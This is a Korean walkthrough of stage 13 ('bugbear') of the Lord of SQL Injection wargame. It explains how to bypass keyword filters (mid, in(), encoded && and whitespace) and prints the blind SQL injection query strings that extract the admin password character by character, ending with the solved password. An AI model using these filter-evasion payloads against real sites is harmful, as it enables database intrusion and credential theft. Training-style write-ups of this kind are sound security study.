Lord of injection bugbear(13단계)

이번문제에서 금지된것은.. 이번에 필터링 되는것은

no는 prob, _(언더바), .(쩜) , ( ) ,'(싱글쿼터), substr , ascii , = , or, and, like, 0x , 공백(스페이스바)이고

pw는 '(싱글쿼터) 이다.

문제에서 금지시키는게 정말많다.....

정말 많은 시간을 투자하여 생각해야한다....

 

substr -> mid

and -> &&(%26%26)

or -> ||

=, like -> in (뒤에 ()!!!)

 (공백) -> %0a 

우선 우회를 해야할것을 찾아와봤다.. 이런식으로 문제를 한번 풀어보자

먼저 항상그랬듯!! 길이부터!!

?no=1%0a||%0aid%0ain%0a("admin")%0a%26%26%0alength(pw)%0ain%0a(8)

자.. 이렇게 길이를 구해봤다.. 역시 이번에도 8이다!

사실 저게 생소하고 길어서 복잡해보이지만 하나하나 뜯어보면 별거없다고 생각한다.

 

쿼리문 하나하나에대해서는 전단계들의 블라인드 인젝션을 할때

지겹도록 얘기했으니 생략하겠다!

 

한 번더 말하지만 in을 쓸때는 꼭 ()를 써야한다 in(8) 이렇게말이다..

 

그럼 값을 이제 값을 알아내보자!

 

?no=1%09||%09id%09in%09("admin")%09%26%26%09(mid(pw,1,1))in(7)
?no=1%09||%09id%09in%09("admin")%09%26%26%09(mid(pw,2,1))in(3)
?no=1%09||%09id%09in%09("admin")%09%26%26%09(mid(pw,3,1))in(5)
?no=1%09||%09id%09in%09("admin")%09%26%26%09(mid(pw,4,1))in("c")
?no=1%09||%09id%09in%09("admin")%09%26%26%09(mid(pw,5,1))in(2)
?no=1%09||%09id%09in%09("admin")%09%26%26%09(mid(pw,6,1))in(7)
?no=1%09||%09id%09in%09("admin")%09%26%26%09(mid(pw,7,1))in(7)
?no=1%09||%09id%09in%09("admin")%09%26%26%09(mid(pw,8,1))in(3) 

 

간단히 다시 말하자면 %09는 %20(whitespace)와 같은역할을하고

%26%26은 &&(and) 와 같은역할

in()은 like와 같은역할

mid는 substr과 같은역할을 해준다.

 

 

?pw=735c2773

자 이렇게 답이 나왔다!!